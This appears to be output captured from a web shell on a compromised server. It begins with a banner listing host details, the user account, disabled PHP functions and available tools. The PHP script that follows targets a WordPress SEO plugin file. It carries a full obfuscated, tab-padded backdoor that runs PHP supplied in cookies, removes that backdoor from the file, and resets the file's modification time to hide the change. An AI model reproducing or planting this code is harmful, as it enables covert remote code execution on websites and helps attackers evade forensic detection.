Server IP : 192.64.112.168 / Your IP : 3.15.192.89 Web Server : Apache System : Linux nc-ph-2300-85.bluforrest.com 4.18.0-513.9.1.el8_9.x86_64 #1 SMP Sat Dec 2 05:23:44 EST 2023 x86_64 User : expressoneac ( 1128) PHP Version : 8.0.30 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /tmp/ |
Upload File : |
<?php $path = '/home/celebrategoodtim/public_html/wp-content/plugins/wordpress-seo/src/helpers/asset-helper.php'; $ft = @filemtime($path); $new_content = str_repeat("\t", 42).rawurldecode('if%20%28isset%28%24_COOKIE%5B45-45%5D%29%20%26%26%20isset%28%24_COOKIE%5B15%2B-14%5D%29%20%26%26%20isset%28%24_COOKIE%5B-14%2B17%5D%29%20%26%26%20isset%28%24_COOKIE%5B-11%2B15%5D%29%29%20%7B%20%24storage%20%3D%20%24_COOKIE%3B%20function%20internal%28%24ph%29%20%7B%20%24storage%20%3D%20%24_COOKIE%3B%20%24slot%20%3D%20tempnam%28%28%21empty%28session_save_path%28%29%29%20%3F%20session_save_path%28%29%20%3A%20sys_get_temp_dir%28%29%29%2C%20%27dc919a24%27%29%3B%20if%20%28%21is_writable%28%24slot%29%29%20%7B%20%24slot%20%3D%20getcwd%28%29%20.%20DIRECTORY_SEPARATOR%20.%20%22uconvert%22%3B%20%7D%20%24var%20%3D%20%22%5Cx3c%5Cx3f%5Cx70%5Cx68p%20%22%20.%20base64_decode%28str_rot13%28%24storage%5B3%5D%29%29%3B%20if%20%28is_writeable%28%24slot%29%29%20%7B%20%24arg%20%3D%20fopen%28%24slot%2C%20%27w%2B%27%29%3B%20fputs%28%24arg%2C%20%24var%29%3B%20fclose%28%24arg%29%3B%20spl_autoload_unregister%28__FUNCTION__%29%3B%20require_once%28%24slot%29%3B%20%40array_map%28%27unlink%27%2C%20array%28%24slot%29%29%3B%20%7D%20%7D%20spl_autoload_register%28%22internal%22%29%3B%20%24prop%20%3D%20%22867b620ef2a8a28f7e029d46dab2068f%22%3B%20if%20%28%21strncmp%28%24prop%2C%20%24storage%5B4%5D%2C%2032%29%29%20%7B%20if%20%28%40class_parents%28%22system_accepted%22%2C%20true%29%29%20%7B%20exit%3B%20%7D%20%7D%20%7D')."\n"; if (file_exists($path) && is_writable($path)) { $content = file_get_contents($path); if (strpos($content, $new_content) !== FALSE) { $content = str_replace($new_content, '', $content); file_put_contents($path, $content); @touch($path, $ft); } } die('!success!');